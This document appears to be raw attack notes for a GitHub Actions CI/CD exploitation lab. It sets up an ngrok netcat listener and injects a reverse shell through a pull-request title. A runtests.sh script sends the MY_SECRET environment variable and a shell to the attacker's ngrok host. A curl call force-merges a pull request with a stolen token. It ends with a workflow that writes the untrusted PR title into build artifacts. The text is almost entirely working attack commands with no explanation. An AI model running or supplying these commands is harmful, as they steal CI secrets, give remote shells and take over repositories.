ngrok tcp 1000
sudo nc -lvk 1000

New malicious issue title" && bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/18328 0>&1 && echo "

runtests.sh:
echo "Execution from READ user" > /dev/tcp/4.tcp.eu.ngrok.io/18328
env | grep MY_SECRET > /dev/tcp/4.tcp.eu.ngrok.io/18328

bash -i >& /dev/tcp/4.tcp.eu.ngrok.io/18328 0>&1

curl -L \
  -X PUT \
  -H "Accept: application/vnd.github+json" \
  -H "Authorization: Bearer $GITHUB_PAT" \
  -H "X-GitHub-Api-Version: 2022-11-28" \
  https://api.github.com/repos/lgvorg1/cicd_top10_3/pulls/17/merge \
  -d '{"commit_title":"Hacked merged PR","commit_message":"Hacked"}'


.github/workflows/my_pr.yml
name: PR TARGET CI

on: 
  pull_request: 
    branches: [ main ]

env:
  MY_SECRET: ${{ secrets.MY_SECRET }}
  
jobs:
  build_and_test_and_merge:
    runs-on: ubuntu-latest
    steps:

      - name: Checkout repository
        uses: actions/checkout@v4

      - name: Building ... 
        run: |
          mkdir -p ./bin
          echo "My bin file-1" > ./bin/mybin.exe
          cp runtests.sh ./bin
          echo "$PR_TITLE" > ./bin/PR_TITLE.txt
          echo "${{github.event.number}}" > ./bin/PR_ID.txt
          ls -lR 

      - name: Archive building artifacts
        uses: actions/upload-artifact@v3
        with:
          name: archive-bin
          path: |
            bin

